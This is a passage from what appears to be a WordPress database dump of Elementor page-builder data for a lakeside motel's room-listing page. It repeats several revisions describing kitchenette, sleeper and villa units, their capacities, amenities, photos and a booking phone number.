imated_gradient_color\":\"#00a6d8\",\"_id\":\"fbba353\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9cdbe3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e33d470\"}]},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f9f470e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff282b8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9fa2d93\"}]},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f2e388c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2d6e7ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dca8900\"}]},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1d2713d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"93c74aa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38e4916\"}]},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"059aaf5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"494138e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c136dd1\"}]},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"6a3f9d8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bc9849a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4500032\"}]},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e51bd4d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aa61889\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"06c9f69\"}]},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015. This unit has 2 bedrooms. One bedroom has a queen bed with a sliding glass door to the lake.<br \\/>The second bedroom has two single beds. The bathroom has a large walk in shower. This unit also has a door off the kitchen to go out to the lake.<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a85728e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8d8736a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0567beb\"}]},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cdfea3f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5fc4265\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"39410d5\"}]},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2e0b5c9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5244ee8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"955d6bd\"}]},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bdf024f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f3002db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bff9ec\"}]},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1337,642,'_elementor_edit_mode','builder'),(1338,642,'_elementor_version','0.4'),(1339,642,'_elementor_data','[{\"id\":\"d945627\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7166a9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c015779\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/> and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5dab5ce\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2ac417b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_border\":\"solid\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br \\/> #9 has one Queen bed, and two single beds one bathroom<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1341,643,'_elementor_edit_mode','builder'),(1342,643,'_elementor_version','0.4'),(1343,643,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/> and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5dab5ce\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2ac417b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_border\":\"solid\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br \\/> #9 has one Queen bed, and two single beds one bathroom<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1345,644,'_elementor_edit_mode','builder'),(1346,644,'_elementor_version','0.4'),(1347,644,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/> and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_border\":\"solid\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\"},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br \\/> #9 has one Queen bed, and two single beds one bathroom<br \\/>Maximum people 4. No pets. No 